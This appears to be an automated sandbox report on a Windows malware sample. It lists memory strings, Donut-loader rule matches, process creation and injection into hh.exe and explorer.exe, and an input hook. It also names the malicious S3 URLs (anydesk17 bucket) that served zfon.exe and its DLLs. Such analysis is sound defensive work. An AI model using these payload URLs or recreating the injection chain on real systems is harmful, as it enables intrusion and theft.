Source: VJQyKuHEUe.exe; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: VJQyKuHEUe.exe; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: VJQyKuHEUe.exe; String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: VJQyKuHEUe.exe; String found in binary or memory: http://ocsp.digicert.com0
Source: VJQyKuHEUe.exe; String found in binary or memory: http://ocsp.digicert.com0A
Source: VJQyKuHEUe.exe; String found in binary or memory: http://ocsp.digicert.com0C
Source: VJQyKuHEUe.exe; String found in binary or memory: http://ocsp.digicert.com0N
Source: VJQyKuHEUe.exe; String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 0000000B.00000002.2589830986.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: VJQyKuHEUe.exe; String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: VJQyKuHEUe.exe; String found in binary or memory: http://s.symcd.com06
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://s3-r-w.ap-east-1.amazonaws.com
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://s3-r-w.ap-east-1.amazonaws.comd
Source: explorer.exe, 0000000B.00000000.2556832450.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2556911362.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.2587251608.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://schemas.micro
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002964000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: VJQyKuHEUe.exe; String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: VJQyKuHEUe.exe; String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: VJQyKuHEUe.exe; String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.10.dr; String found in binary or memory: http://upx.sf.net
Source: VJQyKuHEUe.exe; String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000E.00000003.2749284190.000000000C187000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2726021307.000000000C187000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2737490360.000000000C187000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4608114951.000000000C178000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000B.00000002.2597298593.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2568860335.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 0000000B.00000000.2553828308.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2585817290.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2737490360.000000000C072000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2749284190.000000000C072000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4608114951.000000000C068000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2726021307.000000000C071000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://android.notify.windows.com/iOS
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002970000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.00000000029AC000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002964000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dll
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dlld
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dlld
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/aut.pngd
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dlld
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dlld
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.00000000029AC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/view.png
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.00000000029AC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/view.pngd
Source: VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002940000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exe
Source: explorer.exe, 0000000E.00000003.2658620347.0000000008E15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4601406325.0000000008E02000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000E.00000003.3867808677.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4601406325.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000B.00000000.2552524018.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2583918410.00000000035FA000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://arc.msn.coml
Source: VJQyKuHEUe.exe; String found in binary or memory: https://d.symcb.com/cps0%
Source: VJQyKuHEUe.exe; String found in binary or memory: https://d.symcb.com/rpa0
Source: VJQyKuHEUe.exe; String found in binary or memory: https://d.symcb.com/rpa0.
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000B.00000000.2557975463.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000E.00000003.2663848409.0000000008EC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2668179739.0000000008EC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656028707.0000000008ECC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2671733531.0000000008EC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2658351434.0000000008ECC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2681947926.0000000008ECA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 0000000B.00000002.2597298593.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2568860335.000000000C460000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 0000000E.00000003.3867808677.0000000008E7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3870691749.0000000008E7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3865469179.0000000008E7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4601406325.0000000008E7E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000000B.00000002.2589830986.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 0000000B.00000002.2589830986.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://word.office.comon
Source: explorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://word.office.comz
Source: zfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: 
https://www.battle.net/shop/simplecheckout/loadinghttps://www.battle.net/shop/simplecheckout/navbarh
Source: zfon.exe, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.battle.net/shop/simplecheckout/navbar
Source: VJQyKuHEUe.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown HTTPS traffic detected: 3.5.237.31:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: hh.exe, 00000007.00000002.4592875311.000001CDCB890000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DirectInput8Creatememstr_8fa85bfd-f
Source: C:\Windows\hh.exe Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

System Summary

Source: sslproxydump.pcap, type: PCAP Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 6.2.zfon.exe.7ff7f96e0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000000.2552109850.0000000003050000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.2582901850.0000000003050000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.2529216553.000001AB8875C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.4591031165.000001CDCB5B0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000006.00000003.2529019018.000002DC4A449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000006.00000002.2604535605.000002DC4BEE7000.00000008.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe Code function: 6_2_00007FF7F9818AD3 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe Code function: 6_2_000002DC4BE42030 NtQueryInformationProcess,_invalid_parameter_noinfo_noreturn
Source: C:\Windows\hh.exe Code function: 7_2_000001CDCB5DF9BC NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect
Source: C:\Windows\explorer.exe Code function: 11_2_03073A07 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect
Source: C:\Windows\hh.exe Code function: 7_2_000001CDCB90C340: CreateFileW,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl
Source: C:\Windows\hh.exe File created: C:\ProgramData\kernelquick.sys
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2000 -s 456
Source: VJQyKuHEUe.exe Static PE information: invalid certificate
Source: VJQyKuHEUe.exe, 00000000.00000002.2526972950.00000000008F7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs VJQyKuHEUe.exe
Source: VJQyKuHEUe.exe, 00000000.00000002.2527120443.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs VJQyKuHEUe.exe
Source: sslproxydump.pcap, type: PCAP Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine, Classification label: mal100.evad.winEXE@23/25@5/5
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Code function: 5_2_00007FF8B90F12C0 GetDiskFreeSpaceExW
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Code function: 6_2_000002DC4BE45890 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle
Source: C:\Windows\hh.exe, Code function: 7_2_000001CDCB8F6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetLocalTime,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, File created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314
Source: C:\Windows\hh.exe, Mutant created: \Sessions\1\BaseNamedObjects\????
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2000
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Mutant created: \Sessions\1\BaseNamedObjects\Blizzard_Scene 0.1_sb
Source: C:\Windows\System32\WerFault.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\eb0edcd1-a01c-464d-a74f-e69c15f1f014
Source: unknown, Process created: C:\Windows\explorer.exe
Source: VJQyKuHEUe.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VJQyKuHEUe.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: VJQyKuHEUe.exe, ReversingLabs: Detection: 34%
Source: zfon.exe, String found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: unknown, Process created: C:\Users\user\Desktop\VJQyKuHEUe.exe "C:\Users\user\Desktop\VJQyKuHEUe.exe"
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe"
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Process created: C:\Windows\hh.exe C:\windows\hh.exe
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2000 -s 456
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2000 -s 92
Source: unknown, Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\explorer.exe, Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe"
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: unknown, Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: unknown, Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: unknown, Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, Process created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\VJQyKuHEUe.exe, Section loaded: version.dll
